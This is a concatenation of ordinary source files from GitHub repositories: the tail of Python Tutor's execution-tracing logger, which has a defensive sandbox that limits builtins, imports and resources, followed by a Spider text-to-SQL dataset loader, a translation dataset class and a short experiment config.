self.zombie_frames.append(chosen_parent_frame)\n else:\n # look for code objects of lambdas defined within this\n # function, which comes up in cases like line 2 of:\n # def x(y):\n # (lambda z: lambda w: z+y)(y)\n #\n # x(42)\n if top_frame.f_code.co_consts:\n for e in top_frame.f_code.co_consts:\n if type(e) == types.CodeType and e.co_name == '':\n # TODO: what if it's already in lambda_closures?\n self.lambda_closures[e] = top_frame\n self.parent_frames_set.add(top_frame) # copy-paste from above\n if not top_frame in self.zombie_frames:\n self.zombie_frames.append(top_frame)\n else:\n # if there is only a global scope visible ...\n for (k, v) in get_user_globals(top_frame).items():\n if (type(v) in (types.FunctionType, types.MethodType) and \\\n v not in self.closures):\n self.globally_defined_funcs.add(v)\n\n\n # climb up until you find '', which is (hopefully) the global scope\n top_frame = None\n while True:\n cur_frame = self.stack[i][0]\n cur_name = cur_frame.f_code.co_name\n if cur_name == '':\n break\n\n # do this check because in some cases, certain frames on the\n # stack might NOT be tracked, so don't push a stack entry for\n # those frames. this happens when you have a callback function\n # in an imported module. e.g., your code:\n # def foo():\n # bar(baz)\n #\n # def baz(): pass\n #\n # imported module code:\n # def bar(callback_func):\n # callback_func()\n #\n # when baz is executing, the real stack is [foo, bar, baz] but\n # bar is in imported module code, so pg_logger doesn't trace\n # it, and it doesn't show up in frame_ordered_ids. thus, the\n # stack to render should only be [foo, baz].\n if cur_frame in self.frame_ordered_ids:\n encoded_stack_locals.append(create_encoded_stack_entry(cur_frame))\n if not top_frame:\n top_frame = cur_frame\n i -= 1\n\n zombie_encoded_stack_locals = [create_encoded_stack_entry(e) for e in zombie_frames_to_render]\n\n\n # encode in a JSON-friendly format now, in order to prevent ill\n # effects of aliasing later down the line ...\n encoded_globals = {}\n cur_globals_dict = get_user_globals(tos[0], at_global_scope=(self.curindex <= 1))\n for (k, v) in cur_globals_dict.items():\n if self.should_hide_var(k):\n continue\n\n encoded_val = self.encoder.encode(v, self.get_parent_of_function)\n encoded_globals[k] = encoded_val\n\n if k not in self.all_globals_in_order:\n self.all_globals_in_order.append(k)\n\n # filter out globals that don't exist at this execution point\n # (because they've been, say, deleted with 'del')\n ordered_globals = [e for e in self.all_globals_in_order if e in encoded_globals]\n assert len(ordered_globals) == len(encoded_globals)\n\n\n # merge zombie_encoded_stack_locals and encoded_stack_locals\n # into one master ordered list using some simple rules for\n # making it look aesthetically pretty\n stack_to_render = [];\n\n # first push all regular stack entries\n if encoded_stack_locals:\n for e in encoded_stack_locals:\n e['is_zombie'] = False\n e['is_highlighted'] = False\n stack_to_render.append(e)\n\n # highlight the top-most active stack entry\n stack_to_render[0]['is_highlighted'] = True\n\n\n # now push all zombie stack entries\n for e in zombie_encoded_stack_locals:\n # don't display return value for zombie frames\n # TODO: reconsider ...\n '''\n try:\n e['ordered_varnames'].remove('__return__')\n except ValueError:\n pass\n '''\n\n e['is_zombie'] = True\n e['is_highlighted'] = False # never highlight zombie entries\n\n stack_to_render.append(e)\n\n # now sort by frame_id since that sorts frames in \"chronological\n # order\" based on the order they were invoked\n stack_to_render.sort(key=lambda e: e['frame_id'])\n\n\n\n # create a unique hash for this stack entry, so that the\n # frontend can uniquely identify it when doing incremental\n # rendering. the strategy is to use a frankenstein-like mix of the\n # relevant fields to properly disambiguate closures and recursive\n # calls to the same function\n for e in stack_to_render:\n hash_str = e['func_name']\n # frame_id is UNIQUE, so it can disambiguate recursive calls\n hash_str += '_f' + str(e['frame_id'])\n\n # needed to refresh GUI display ...\n if e['is_parent']:\n hash_str += '_p'\n\n # TODO: this is no longer needed, right? (since frame_id is unique)\n #if e['parent_frame_id_list']:\n # hash_str += '_p' + '_'.join([str(i) for i in e['parent_frame_id_list']])\n if e['is_zombie']:\n hash_str += '_z'\n\n e['unique_hash'] = hash_str\n\n\n # handle probe_exprs *before* encoding the heap with self.encoder.get_heap\n encoded_probe_vals = {}\n if self.probe_exprs:\n if top_frame: # are we in a function call?\n top_frame_locals = get_user_locals(top_frame)\n else:\n top_frame_locals = {}\n for e in self.probe_exprs:\n try:\n # evaluate it with globals + locals of the top frame ...\n probe_val = eval(e, cur_globals_dict, top_frame_locals)\n encoded_probe_vals[e] = self.encoder.encode(probe_val, self.get_parent_of_function)\n except:\n pass # don't encode the value if there's been an error\n\n if self.show_only_outputs:\n trace_entry = dict(line=lineno,\n event=event_type,\n func_name=tos[0].f_code.co_name,\n globals={},\n ordered_globals=[],\n stack_to_render=[],\n heap={},\n stdout=self.get_user_stdout())\n else:\n trace_entry = dict(line=lineno,\n event=event_type,\n func_name=tos[0].f_code.co_name,\n globals=encoded_globals,\n ordered_globals=ordered_globals,\n stack_to_render=stack_to_render,\n heap=self.encoder.get_heap(),\n stdout=self.get_user_stdout())\n if encoded_probe_vals:\n trace_entry['probe_exprs'] = encoded_probe_vals\n\n # optional column numbers for greater precision\n # (only relevant in Py2crazy, a hacked CPython that supports column numbers)\n if self.crazy_mode:\n # at the very least, grab the column number\n trace_entry['column'] = frame.f_colno\n\n # now try to find start_col and extent\n # (-1 is an invalid instruction index)\n if frame.f_lasti >= 0:\n key = (frame.f_code.co_code, frame.f_lineno, frame.f_colno,frame.f_lasti)\n if key in self.bytecode_map:\n v = self.bytecode_map[key]\n trace_entry['expr_start_col'] = v.start_col\n trace_entry['expr_width'] = v.extent\n trace_entry['opcode'] = v.opcode\n\n # set a 'custom_module_name' field if we're executing in a module\n # that's not the __main__ script:\n if topframe_module != \"__main__\":\n trace_entry['custom_module_name'] = topframe_module\n\n # if there's an exception, then record its info:\n if event_type == 'exception':\n # always check in f_locals\n exc = frame.f_locals['__exception__']\n trace_entry['exception_msg'] = exc[0].__name__ + ': ' + str(exc[1])\n\n\n # append to the trace only the breakpoint line and the next\n # executed line, so that if you set only ONE breakpoint, OPT shows\n # the state before and after that line gets executed.\n append_to_trace = True\n if self.breakpoints:\n if not ((lineno in self.breakpoints) or (self.prev_lineno in self.breakpoints)):\n append_to_trace = False\n\n # TRICKY -- however, if there's an exception, then ALWAYS\n # append it to the trace, so that the error can be displayed\n if event_type == 'exception':\n append_to_trace = True\n\n self.prev_lineno = lineno\n\n if append_to_trace:\n self.trace.append(trace_entry)\n\n\n # sanity check to make sure the state of the world at a 'call' instruction\n # is identical to that at the instruction immediately following it ...\n '''\n if len(self.trace) > 1:\n cur = self.trace[-1]\n prev = self.trace[-2]\n if prev['event'] == 'call':\n assert cur['globals'] == prev['globals']\n for (s1, s2) in zip(cur['stack_to_render'], prev['stack_to_render']):\n assert s1 == s2\n assert cur['heap'] == prev['heap']\n assert cur['stdout'] == prev['stdout']\n '''\n\n\n if len(self.trace) >= MAX_EXECUTED_LINES:\n self.trace.append(dict(event='instruction_limit_reached', exception_msg='Stopped after running ' + str(MAX_EXECUTED_LINES) + ' steps. Please shorten your code,\\nsince Python Tutor is not designed to handle long-running code.'))\n self.force_terminate()\n\n self.forget()\n\n\n def _runscript(self, script_str):\n self.executed_script = script_str\n self.executed_script_lines = self.executed_script.splitlines()\n\n for (i, line) in enumerate(self.executed_script_lines):\n line_no = i + 1\n # subtle -- if the stripped line starts with '#break', that\n # means it may be a commented-out version of a normal Python\n # 'break' statement, which shouldn't be confused with an\n # OPT user-defined breakpoint!\n #\n # TODO: this still fails when someone writes something like\n # '##break' since it doesn't start with '#break'!!! i just\n # picked an unfortunate name that's also a python keyword :0\n if line.endswith(BREAKPOINT_STR) and not line.strip().startswith(BREAKPOINT_STR):\n self.breakpoints.append(line_no)\n\n if line.startswith(PYTUTOR_HIDE_STR):\n hide_vars = line[len(PYTUTOR_HIDE_STR):]\n # remember to call strip() -> compileGlobMatch()\n hide_vars = [compileGlobMatch(e.strip()) for e in hide_vars.split(',')]\n self.vars_to_hide.update(hide_vars)\n\n if line.startswith(PYTUTOR_INLINE_TYPE_STR):\n listed_types = line[len(PYTUTOR_INLINE_TYPE_STR):]\n # remember to call strip() -> compileGlobMatch()\n listed_types = [compileGlobMatch(e.strip()) for e in listed_types.split(',')]\n self.types_to_inline.update(listed_types)\n\n\n # populate an extent map to get more accurate ranges from code\n if self.crazy_mode:\n # in Py2crazy standard library as Python-2.7.5/Lib/super_dis.py\n import super_dis\n try:\n self.bytecode_map = super_dis.get_bytecode_map(self.executed_script)\n except:\n # failure oblivious\n self.bytecode_map = {}\n\n\n # When bdb sets tracing, a number of call and line events happens\n # BEFORE debugger even reaches user's code (and the exact sequence of\n # events depends on python version). So we take special measures to\n # avoid stopping before we reach the main script (see user_line and\n # user_call for details).\n self._wait_for_mainpyfile = 1\n\n\n # ok, let's try to sorta 'sandbox' the user script by not\n # allowing certain potentially dangerous operations.\n user_builtins = {}\n\n # ugh, I can't figure out why in Python 2, __builtins__ seems to\n # be a dict, but in Python 3, __builtins__ seems to be a module,\n # so just handle both cases ... UGLY!\n if type(__builtins__) is dict:\n builtin_items = __builtins__.items()\n else:\n assert type(__builtins__) is types.ModuleType\n builtin_items = []\n for k in dir(__builtins__):\n builtin_items.append((k, getattr(__builtins__, k)))\n\n for (k, v) in builtin_items:\n if k == 'open' and not self.allow_all_modules: # put this before BANNED_BUILTINS\n user_builtins[k] = open_wrapper\n elif k in BANNED_BUILTINS:\n user_builtins[k] = create_banned_builtins_wrapper(k)\n elif k == '__import__' and not self.allow_all_modules:\n user_builtins[k] = __restricted_import__\n else:\n if k == 'raw_input':\n user_builtins[k] = raw_input_wrapper\n elif k == 'input':\n if is_python3:\n # Python 3 input() is Python 2 raw_input()\n user_builtins[k] = raw_input_wrapper\n else:\n user_builtins[k] = python2_input_wrapper\n else:\n user_builtins[k] = v\n\n user_builtins['mouse_input'] = mouse_input_wrapper\n\n if self.separate_stdout_by_module:\n self.stdout_by_module[\"__main__\"] = StringIO.StringIO()\n if self.custom_modules:\n for module_name in self.custom_modules:\n self.stdout_by_module[module_name] = StringIO.StringIO()\n self.stdout_by_module[\"\"] = StringIO.StringIO() # catch-all for all other modules we're NOT tracing\n sys.stdout = self.stdout_by_module[\"\"] # start with \n else:\n # default -- a single unified stdout stream\n self.user_stdout = StringIO.StringIO()\n sys.stdout = self.user_stdout\n\n self.ORIGINAL_STDERR = sys.stderr\n\n # don't do this, or else certain kinds of errors, such as syntax\n # errors, will be silently ignored. WEIRD!\n #sys.stderr = NullDevice # silence errors\n\n user_globals = {}\n\n # if there are custom_modules, 'import' them into user_globals,\n # which emulates \"from import *\"\n if self.custom_modules:\n for mn in self.custom_modules:\n # http://code.activestate.com/recipes/82234-importing-a-dynamically-generated-module/\n new_m = imp.new_module(mn)\n exec(self.custom_modules[mn], new_m.__dict__) # exec in custom globals\n user_globals.update(new_m.__dict__)\n\n # important: do this LAST to get precedence over values in custom_modules\n user_globals.update({\"__name__\" : \"__main__\",\n \"__builtins__\" : user_builtins})\n\n try:\n # if allow_all_modules is on, then try to parse script_str into an\n # AST, traverse the tree to find all modules that it imports, and then\n # try to PRE-IMPORT all of those. if we *don't* pre-import a module,\n # then when it's imported in the user's code, it may take *forever*\n # because the bdb debugger tries to single-step thru that code\n # (i think!). run 'import pandas' to quickly test this.\n if self.allow_all_modules:\n import ast\n try:\n all_modules_to_preimport = []\n tree = ast.parse(script_str)\n for node in ast.walk(tree):\n if isinstance(node, ast.Import):\n for n in node.names:\n all_modules_to_preimport.append(n.name)\n elif isinstance(node, ast.ImportFrom):\n all_modules_to_preimport(node.module)\n\n for m in all_modules_to_preimport:\n if m in script_str: # optimization: load only modules that appear in script_str\n try:\n __import__(m)\n except ImportError:\n pass\n except:\n pass\n\n\n # enforce resource limits RIGHT BEFORE running script_str\n\n # set ~200MB virtual memory limit AND a 5-second CPU time\n # limit (tuned for Webfaction shared hosting) to protect against\n # memory bombs such as:\n # x = 2\n # while True: x = x*x\n if resource_module_loaded and (not self.disable_security_checks):\n assert not self.allow_all_modules # <-- shouldn't be on!\n\n # PREEMPTIVELY import all of these modules, so that when the user's\n # script imports them, it won't try to do a file read (since they've\n # already been imported and cached in memory). Remember that when\n # the user's code runs, resource.setrlimit(resource.RLIMIT_NOFILE, (0, 0))\n # will already be in effect, so no more files can be opened.\n for m in ALLOWED_STDLIB_MODULE_IMPORTS:\n if m in script_str: # optimization: load only modules that appear in script_str\n try:\n __import__(m)\n except ImportError:\n pass\n\n resource.setrlimit(resource.RLIMIT_AS, (200000000, 200000000))\n resource.setrlimit(resource.RLIMIT_CPU, (5, 5))\n\n # protect against unauthorized filesystem accesses ...\n resource.setrlimit(resource.RLIMIT_NOFILE, (0, 0)) # no opened files allowed\n\n # VERY WEIRD. If you activate this resource limitation, it\n # ends up generating an EMPTY trace for the following program:\n # \"x = 0\\nfor i in range(10):\\n x += 1\\n print x\\n x += 1\\n\"\n # (at least on my Webfaction hosting with Python 2.7)\n #resource.setrlimit(resource.RLIMIT_FSIZE, (0, 0)) # (redundancy for paranoia)\n\n # The posix module is a built-in and has a ton of OS access\n # facilities ... if you delete those functions from\n # sys.modules['posix'], it seems like they're gone EVEN IF\n # someone else imports posix in a roundabout way. Of course,\n # I don't know how foolproof this scheme is, though.\n # (It's not sufficient to just \"del sys.modules['posix']\";\n # it can just be reimported without accessing an external\n # file and tripping RLIMIT_NOFILE, since the posix module\n # is baked into the python executable, ergh. Actually DON'T\n # \"del sys.modules['posix']\", since re-importing it will\n # refresh all of the attributes. ergh^2)\n for a in dir(sys.modules['posix']):\n delattr(sys.modules['posix'], a)\n # do the same with os\n for a in dir(sys.modules['os']):\n # 'path' is needed for __restricted_import__ to work\n # and 'stat' is needed for some errors to be reported properly\n if a not in ('path', 'stat'):\n delattr(sys.modules['os'], a)\n # ppl can dig up trashed objects with gc.get_objects()\n import gc\n for a in dir(sys.modules['gc']):\n delattr(sys.modules['gc'], a)\n del sys.modules['gc']\n\n # sys.modules contains an in-memory cache of already-loaded\n # modules, so if you delete modules from here, they will\n # need to be re-loaded from the filesystem.\n #\n # Thus, as an extra precaution, remove these modules so that\n # they can't be re-imported without opening a new file,\n # which is disallowed by resource.RLIMIT_NOFILE\n #\n # Of course, this isn't a foolproof solution by any means,\n # and it might lead to UNEXPECTED FAILURES later in execution.\n del sys.modules['os']\n del sys.modules['os.path']\n del sys.modules['sys']\n\n self.run(script_str, user_globals, user_globals)\n # sys.exit ...\n except SystemExit:\n #sys.exit(0)\n raise bdb.BdbQuit\n except:\n if DEBUG:\n traceback.print_exc()\n\n trace_entry = dict(event='uncaught_exception')\n\n (exc_type, exc_val, exc_tb) = sys.exc_info()\n if hasattr(exc_val, 'lineno'):\n trace_entry['line'] = exc_val.lineno\n if hasattr(exc_val, 'offset'):\n trace_entry['offset'] = exc_val.offset\n\n trace_entry['exception_msg'] = type(exc_val).__name__ + \": \" + str(exc_val)\n\n # SUPER SUBTLE! if ANY exception has already been recorded by\n # the program, then DON'T record it again as an uncaught_exception.\n # This looks kinda weird since the exact exception message doesn't\n # need to match up, but in practice, there should be at most only\n # ONE exception per trace.\n already_caught = False\n for e in self.trace:\n if e['event'] == 'exception':\n already_caught = True\n break\n\n if not already_caught:\n if not self.done:\n self.trace.append(trace_entry)\n\n raise bdb.BdbQuit # need to forceably STOP execution\n\n\n def force_terminate(self):\n #self.finalize()\n raise bdb.BdbQuit # need to forceably STOP execution\n\n\n def finalize(self):\n sys.stdout = self.GAE_STDOUT # very important!\n sys.stderr = self.ORIGINAL_STDERR\n\n assert len(self.trace) <= (MAX_EXECUTED_LINES + 1)\n\n # don't do this anymore ...\n '''\n # filter all entries after 'return' from '', since they\n # seem extraneous:\n res = []\n for e in self.trace:\n res.append(e)\n if e['event'] == 'return' and e['func_name'] == '':\n break\n '''\n\n res = self.trace\n\n # if the SECOND to last entry is an 'exception'\n # and the last entry is return from , then axe the last\n # entry, for aesthetic reasons :)\n if len(res) >= 2 and \\\n res[-2]['event'] == 'exception' and \\\n res[-1]['event'] == 'return' and res[-1]['func_name'] == '':\n res.pop()\n\n self.trace = res\n\n if self.custom_modules:\n # when there's custom_modules, call with a dict as the first parameter\n return self.finalizer_func(dict(main_code=self.executed_script,\n custom_modules=self.custom_modules),\n self.trace)\n else:\n # common case\n return self.finalizer_func(self.executed_script, self.trace)\n\n\nimport json\n\n# the MAIN meaty function!!!\ndef exec_script_str(script_str, raw_input_lst_json, options_json, finalizer_func):\n if options_json:\n options = json.loads(options_json)\n else:\n # defaults\n options = {'cumulative_mode': False,\n 'heap_primitives': False, 'show_only_outputs': False}\n\n py_crazy_mode = ('py_crazy_mode' in options and options['py_crazy_mode'])\n\n logger = PGLogger(options['cumulative_mode'], options['heap_primitives'], options['show_only_outputs'], finalizer_func,\n crazy_mode=py_crazy_mode)\n\n # TODO: refactor these NOT to be globals\n global input_string_queue\n input_string_queue = []\n if raw_input_lst_json:\n # TODO: if we want to support unicode, remove str() cast\n input_string_queue = [str(e) for e in json.loads(raw_input_lst_json)]\n\n try:\n logger._runscript(script_str)\n except bdb.BdbQuit:\n pass\n finally:\n logger.finalize()\n\n\n# disables security check and returns the result of finalizer_func\n# WARNING: ONLY RUN THIS LOCALLY and never over the web, since\n# security checks are disabled\n#\n# [optional] probe_exprs is a list of strings representing\n# expressions whose values to probe at each step (advanced)\ndef exec_script_str_local(script_str, raw_input_lst_json, cumulative_mode, heap_primitives, finalizer_func,\n probe_exprs=None, allow_all_modules=False):\n logger = PGLogger(cumulative_mode, heap_primitives, False, finalizer_func,\n disable_security_checks=True,\n allow_all_modules=allow_all_modules,\n probe_exprs=probe_exprs)\n\n # TODO: refactor these NOT to be globals\n global input_string_queue\n input_string_queue = []\n if raw_input_lst_json:\n # TODO: if we want to support unicode, remove str() cast\n input_string_queue = [str(e) for e in json.loads(raw_input_lst_json)]\n\n try:\n logger._runscript(script_str)\n except bdb.BdbQuit:\n pass\n finally:\n return logger.finalize()\n","repo_name":"fbeilstein/machine_learning","sub_path":"pytutor/pg_logger.py","file_name":"pg_logger.py","file_ext":"py","file_size_in_byte":66106,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"61"} +{"seq_id":"18168420301","text":"import os\nimport dataclasses\nimport json\nfrom typing import Optional, Tuple, List, Iterable\n\nimport attr\nimport networkx as nx\nfrom networkx.drawing.layout import shell_layout\nfrom pydantic.dataclasses import dataclass\nfrom pydantic.main import BaseConfig\nfrom torch.utils.data import Dataset\n\nfrom duorat.utils import registry\nfrom third_party.spider import evaluation\nfrom third_party.spider.preprocess.schema import get_schemas_from_json, Schema\nfrom third_party.spider.process_sql import get_sql\n\n\n@dataclass\nclass SpiderTable:\n \"\"\"数据表\"\"\"\n id: int # 表号\n name: List[str] # 表名 list\n unsplit_name: str # TODO (YuweiYin) 解释此属性含义/作用\n orig_name: str # TODO (YuweiYin) 解释此属性含义/作用\n orig_name_for_unparse: str # 用于在unparse时输出原始表名\n columns: List[\"SpiderColumn\"] = dataclasses.field(default_factory=list) # 本表含有的列 list\n primary_keys: List[str] = dataclasses.field(default_factory=list) # 本表的主键 list\n\n\n@dataclass\nclass SpiderColumn:\n \"\"\"数据列\"\"\"\n id: int # 列号\n table: Optional[SpiderTable] # 本列属于那个表\n name: List[str] # 列名 list\n unsplit_name: str # TODO (YuweiYin) 解释此属性含义/作用\n orig_name: str # TODO (YuweiYin) 解释此属性含义/作用\n orig_name_for_unparse: str # 用于在unparse时输出原始列名\n type: str # 列类型名称\n foreign_key_for: Optional[str] = None # 外键名称\n\n\nSpiderTable.__pydantic_model__.update_forward_refs()\n\n\nclass SpiderSchemaConfig:\n arbitrary_types_allowed = True\n\n\n@dataclass(config=SpiderSchemaConfig)\nclass SpiderSchema(BaseConfig):\n \"\"\"数据库\"\"\"\n db_id: str # 数据库号\n tables: Tuple[SpiderTable, ...] # 本数据库含有的数据表 list\n columns: Tuple[SpiderColumn, ...] # 本数据库含有的数据列 list\n foreign_key_graph: nx.DiGraph # 通过外键关系构建的有向图\n orig: dict # TODO (YuweiYin) 解释此属性含义/作用\n\n\n@dataclass\nclass SpiderItem:\n \"\"\"数据项 slml: Schema Linking Markup Language\"\"\"\n question: str # 自然语言问题\n slml_question: Optional[str] # TODO (YuweiYin) 解释此属性含义/作用 (应该是对 question 进行 parsing 后的 AST 相关结构)\n query: str # SQL 语句 (真值标签)\n spider_sql: dict # 数据集中给出的 sql 结构\n spider_schema: SpiderSchema # 本数据项所在数据库\n db_path: str # 本数据项所在数据库原始文件的路径\n orig: dict # TODO (YuweiYin) 解释此属性含义/作用\n\ndef schema_dict_to_spider_schema(schema_dict):\n # 建立各个数据表 SpiderTable 对象,构成元组\n tables = tuple(\n SpiderTable(id=i, name=name.split(), unsplit_name=name, orig_name=orig_name, orig_name_for_unparse=orig_name_for_unparse)\n for i, (name, orig_name, orig_name_for_unparse) in enumerate(\n zip(schema_dict[\"table_names\"], schema_dict[\"table_names_original\"], schema_dict[\"original_table_names\"])\n )\n )\n # 建立各个数据列 SpiderColumn 对象,构成元组\n columns = tuple(\n SpiderColumn(\n id=i,\n table=tables[table_id] if table_id >= 0 else None,\n name=col_name.split(),\n unsplit_name=col_name,\n orig_name=orig_col_name,\n orig_name_for_unparse=orig_col_name_for_unparse,\n type=col_type,\n )\n for i, ((table_id, col_name), (_, orig_col_name), col_type, (_, orig_col_name_for_unparse)) in enumerate(\n zip(\n schema_dict[\"column_names\"],\n schema_dict[\"column_names_original\"],\n schema_dict[\"column_types\"],\n schema_dict[\"original_column_names\"]\n )\n )\n )\n\n # Link columns to tables 让数据列链指向 其所在的数据表\n for column in columns:\n if column.table:\n column.table.columns.append(column)\n\n # 设置数据列的主键\n for column_id in schema_dict[\"primary_keys\"]:\n # Register primary keys\n column = columns[column_id]\n column.table.primary_keys.append(column)\n\n # 设置外键图结构,有向边为 源列 和 目标列 的双向边\n foreign_key_graph = nx.DiGraph()\n for source_column_id, dest_column_id in schema_dict[\"foreign_keys\"]:\n # Register foreign keys\n source_column = columns[source_column_id]\n dest_column = columns[dest_column_id]\n source_column.foreign_key_for = dest_column\n\n # 设置双向链接\n foreign_key_graph.add_edge(\n source_column.table.id,\n dest_column.table.id,\n columns=(source_column_id, dest_column_id),\n )\n foreign_key_graph.add_edge(\n dest_column.table.id,\n source_column.table.id,\n columns=(dest_column_id, source_column_id),\n )\n\n # 建立并返回数据库 SpiderSchema 对象\n db_id = schema_dict[\"db_id\"]\n return SpiderSchema(db_id, tables, columns, foreign_key_graph, schema_dict)\n\n\ndef load_tables(paths):\n \"\"\"\n :param paths: 列表,每个列表项为某个数据库的目录路径\n :return: 全部数据库 和 外键映射字典\n \"\"\"\n schemas = {}\n eval_foreign_key_maps = {}\n\n for path in paths:\n schema_dicts = json.load(open(path))\n for schema_dict in schema_dicts:\n db_id = schema_dict[\"db_id\"]\n assert db_id not in schemas\n \n schemas[db_id] = schema_dict\n eval_foreign_key_maps[db_id] = evaluation.build_foreign_key_map(schema_dict)\n\n return schemas, eval_foreign_key_maps\n\n\ndef load_original_schemas(tables_paths):\n # 从 json 文件加载原始数据库结构\n all_schemas = {}\n for path in tables_paths:\n schemas, db_ids, tables = get_schemas_from_json(path)\n for db_id in db_ids:\n all_schemas[db_id] = Schema(schemas[db_id], tables[db_id])\n return all_schemas\n\n\ndef check_now_time(entry, schema):\n \"\"\"\n 检查 entry 数据项中的 TIME_NOW,将其转化为表中一列\n \"\"\"\n if schema['column_names'][-1] != [0, '当前时间']:\n schema['column_names'].append([0, '当前时间'])\n schema['column_types'].append('time')\n schema['column_names_original'].append([0, '当前时间'])\n schema['original_column_names'].append([0, '当前时间'])\n #print(entry['sql'])\n if 'where' in entry['sql'].keys():\n where_cond = entry['sql']['where']\n if len(where_cond) > 0:\n temp = where_cond[0][2][1][1]\n if temp == 'TIME_NOW':\n entry['sql']['where'][0][2][1][1] = len(schema['column_names'])-1\n return True\n return False\n\n\n@registry.register(\"dataset\", \"spider\")\nclass SpiderDataset(Dataset):\n def __init__(self, paths: List[str], tables_paths: List[str], db_path: str):\n self.paths = paths\n self.db_path = db_path\n self.examples = [] # 全部数据项对象 list\n\n # 加载全部数据库 和 外键映射字典\n self.schemas, self.eval_foreign_key_maps = load_tables(tables_paths)\n\n raw_datas = []\n # 处理 time_now 的 column\n for path in paths:\n # 读入数据\n raw_data = json.load(open(path))\n for i, entry in enumerate(raw_data):\n # 检查 entry 数据项中的 TIME_NOW 列,将其转化为表中一列\n check_now_time(entry, self.schemas[entry['db_id']])\n \n # 重写数据会引起bug, 直接把修改后的数据放到数组里\n raw_datas.append(raw_data)\n\n # 建立各个数据库对象 (及其内部的数据表、数据列对象)\n for db_id, schema_dict in self.schemas.items():\n self.schemas[db_id] = schema_dict_to_spider_schema(schema_dict)\n\n # 从 json 文件加载原始数据库结构\n original_schemas = load_original_schemas(tables_paths)\n\n # 遍历原始数据\n for raw_data in raw_datas: \n for entry in raw_data:\n # 获得原始数据的 sql 项,它用于构成 AST 抽象语法树\n if \"sql\" not in entry:\n entry[\"sql\"] = get_sql(\n original_schemas[entry[\"db_id\"]], entry[\"query\"]\n )\n # 构建数据项对象\n item = SpiderItem(\n question=entry[\"question\"],\n slml_question=entry.get(\"slml_question\", None),\n query=entry[\"original_sql_query\"] if 'original_sql_query' in entry.keys() else entry[\"query\"],\n spider_sql=entry[\"sql\"],\n spider_schema=self.schemas[entry[\"db_id\"]],\n db_path=self.get_db_path(entry[\"db_id\"]),\n orig=entry,\n )\n # 将此数据项加入 self.examples 中,即全部数据项对象 list\n self.examples.append(item)\n\n def get_db_path(self, db_id: str):\n return os.path.join(self.db_path, db_id, 'contents.json')\n\n def __len__(self) -> int:\n return len(self.examples)\n\n def __getitem__(self, idx) -> SpiderItem:\n return self.examples[idx]\n\n class Metrics:\n def __init__(self, dataset):\n self.dataset = dataset\n self.foreign_key_maps = {\n db_id: evaluation.build_foreign_key_map(schema.orig)\n for db_id, schema in self.dataset.schemas.items()\n }\n self.evaluator = evaluation.Evaluator(\n self.dataset.db_path, self.foreign_key_maps, \"match\"\n )\n self.results = []\n\n def add(self, item: SpiderItem, inferred_code: str):\n res = self.evaluator.evaluate_one(\n db_name=item.spider_schema.db_id,\n gold=item.query,\n predicted=inferred_code,\n )\n self.results.append(res)\n return res \n\n def evaluate_all(\n self, idx: int, item: SpiderItem, inferred_codes: Iterable[str]\n ) -> Tuple[int, list]:\n beams = [\n self.evaluator.evaluate_one(\n db_name=item.spider_schema.db_id,\n gold=item.query,\n predicted=inferred_code,\n )\n for inferred_code in inferred_codes\n ]\n return idx, beams\n\n def finalize(self) -> dict:\n self.evaluator.finalize()\n return {\n \"per_item\": self.results, \n \"total_scores\": self.evaluator.scores,\n }\n","repo_name":"hyc2026/text2sql","sub_path":"duorat/datasets/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42308394224","text":"import json\n\nimport numpy\nimport torch\nimport torch.utils.data as data\nfrom tqdm import tqdm\n\nfrom . import ptext\n\n\nclass MLTDataSet(data.Dataset):\n\n def __init__(self, data_path, vocab_path) -> None:\n super().__init__()\n self.lang1, self.lang2 = ptext.parse(data_path)\n vocab = {}\n with open(vocab_path, 'r', encoding='utf-8') as fd:\n vocab = json.load(fd)\n self.input = [[vocab['lang1']['SOS'],\n *[vocab['lang1'][token] for token in line],\n vocab['lang1']['EOS']] for line in tqdm(self.lang1, desc='Converting Text to Index for input')]\n # not adding SOS in target as it does not need to be predicted\n self.target = [[*[vocab['lang2'][token] for token in line],\n vocab['lang2']['EOS']]\n for line in tqdm(self.lang2, desc='Converting Text to Index for target')]\n self.start_id = vocab['lang1']['SOS']\n self.end_id = vocab['lang1']['EOS']\n self.vocab = vocab\n self.index_to_token_target = {item[1]: item[0] for item in vocab['lang2'].items()}\n print('Vocab Size-{}'.format(self.get_input_size()))\n\n def __getitem__(self, index: int):\n return index, self.input[index], self.target[index]\n\n def __len__(self) -> int:\n return len(self.input)\n\n def get_start_end(self):\n return self.start_id, self.end_id\n\n def get_input_size(self):\n return len(self.vocab['lang1']), len(self.vocab['lang2'])\n\n def save_evaluated(self, answ, indx, loss, eval_filename):\n with open(eval_filename, 'w', encoding='utf-8') as fd:\n pred = []\n for itr, ind in enumerate(indx):\n pred.append({\n 'input': ' '.join(self.lang1[ind]),\n 'target': ' '.join(self.lang2[ind]),\n 'predicted': ' '.join([self.index_to_token_target[i] for i in answ[itr]])\n })\n pred.append({\n 'loss': loss\n })\n json.dump(pred, fd, indent=4, ensure_ascii=False)\n","repo_name":"nikhilkarnwal/CVML","sub_path":"ailabs/nlp/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3143941842","text":"from sklearn.model_selection import ParameterGrid\n\ndataset_params = list(ParameterGrid(\n dict(\n drugs_file=[None],\n data_file=['/home/rogia/datasets/drugbank.csv'],\n dataset_name=['drugbank'],\n transform=['SmilesToSeq'],\n min_count=[0],\n num_rounds=[1], # aller jusqu,a 10\n debug=[True]\n )\n))\n\nexpt_config = dict(\n dataset_params=dataset_params,\n pretrained_model_path=[\n \"/home/rogia/Documents/git/RuRe/baselines_with_rand/conv1d_08b11d7789e62972bd51acf10d382f3100cd8e6c\"]\n)\n","repo_name":"srkpa/SMRDDI","sub_path":"configs/test_baseline_with_rand.py","file_name":"test_baseline_with_rand.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"91327089","text":"\"\"\"https://adventofcode.com/2021/day/13#part2\"\"\"\n\nimport re\nimport numpy as np\nfrom imageio import imwrite\n\ndata = open(\"day-13/input\", \"r\", encoding=\"utf-8\").read()\ncoords_section, folds_section = data.split(\"\\n\\n\")\ncoords = {tuple(map(int, 